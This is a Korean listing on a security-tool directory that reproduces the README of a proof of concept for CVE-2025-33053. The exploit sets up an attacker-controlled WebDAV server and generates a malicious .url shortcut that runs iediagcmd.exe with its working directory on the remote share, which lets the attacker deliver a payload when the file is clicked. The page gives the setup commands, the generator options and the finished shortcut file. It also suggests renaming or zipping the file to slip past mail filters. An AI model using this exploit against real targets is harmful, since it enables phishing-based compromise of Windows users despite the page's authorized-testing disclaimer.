Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 개념 증명 (PoC) | Kitploit
도구/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Payload GenerationExploitationLateral MovementPhishingWeb SecurityPenetration TestingCommand and ControlSocial EngineeringRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 개념 증명 (PoC)

저장소 보기
6416131년 전Kitploit 검토 완료

CVE-2025-33053 개념 증명

이 저장소는 Apache2를 사용하여 Ubuntu에 WebDAV 서버를 자동으로 배포하고, 피싱, 레드 팀 운영 또는 측면 이동 시뮬레이션에 사용할 악성 .url 바로 가기 파일을 생성하는 스크립트를 제공합니다.


📁 구성

  • setup_webdav.sh – Apache2 + WebDAV를 구성하는 Bash 스크립트.
  • setup_webdav.py – 위 스크립트의 Python 버전.
  • gen_url.py – UNC/WebDAV 경로가 포함된 .url 바로 가기 파일을 생성하는 Python 스크립트.
  • README.md – 문서.

🔧 요구 사항

  • OS: Ubuntu 20.04 이상 (Debian 호환)
  • 루트 권한 (sudo)
  • Python 3.x

🚀 설정 방법

1. WebDAV 서버 (Bash 사용)

sudo bash setup_webdav.sh

또는 Python 사용:

sudo python3 setup_webdav.py

기본적으로 스크립트는 다음을 수행합니다:

  • Apache 및 필요한 WebDAV 모듈 설치.
  • /var/www/webdav에 공유 디렉터리 생성.
  • DAV 및 DAV_FS 모듈 활성화.
  • DavLockDB 디렉터리 생성 (Apache DAV 잠금 오류 방지).
  • Apache 서비스 다시 시작.

📎 WebDAV 경로: http://<your-ip>/webdav/


💣 악성 .url 바로 가기 생성

사용 예시:

python3 gen_url.py --ip 192.168.1.100 --out doc.url

모든 옵션:

python3 gen_url.py \
  --ip 《YOUR IP ADDRESS》\
  --share 《YOUR SHARE NAME》(기본값: webdav) \
  --out 《YOUR OUTPUT FILENAME.url》(기본값: bait.url) \
  --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
  --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
  --index 13 \
  --modified 20F06BA06D07BD014D

다음과 같은 .url 파일이 생성됩니다:

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

📌 이 파일을 클릭하면 (특정 구성에서) 대상 시스템이 자동으로 WebDAV 서버에 연결될 수 있습니다 (인증 또는 DLL 전달).


🔒 보안 테스트 참고 사항

  • 방화벽 비활성화 (또는 포트 80 열기): 로컬 네트워크에서 테스트하는 경우:
    sudo ufw allow 80
    
  • .url 파일은 다음 조건에 따라 예상대로 실행되지 않을 수 있습니다:
    • 그룹 정책 제한
    • 애플리케이션 기본값
    • 이메일 클라이언트 (Gmail은 이를 정리할 수 있음)
  • 필터를 우회하려면 .url 파일을 .txt로 압축하거나 이름을 변경해야 할 수 있습니다.

⚠️ 법적 고지

이 저장소는 교육 및 승인된 침투 테스트 전용입니다.
소유하지 않거나 테스트 권한이 없는 시스템에 대해 이 스크립트를 사용하지 마십시오.


🧠 참고 자료

  • WebDAV 서버 설정 - LinuxConfig.org
  • WebDAV Apache 구성 - Peter Girnus
  • Microsoft WebDAV 문서

📬 연락처

질문이나 윤리적인 레드 팀 요청이 있으시면 GitHub 이슈를 통해 연락해 주십시오.

도구 다운로드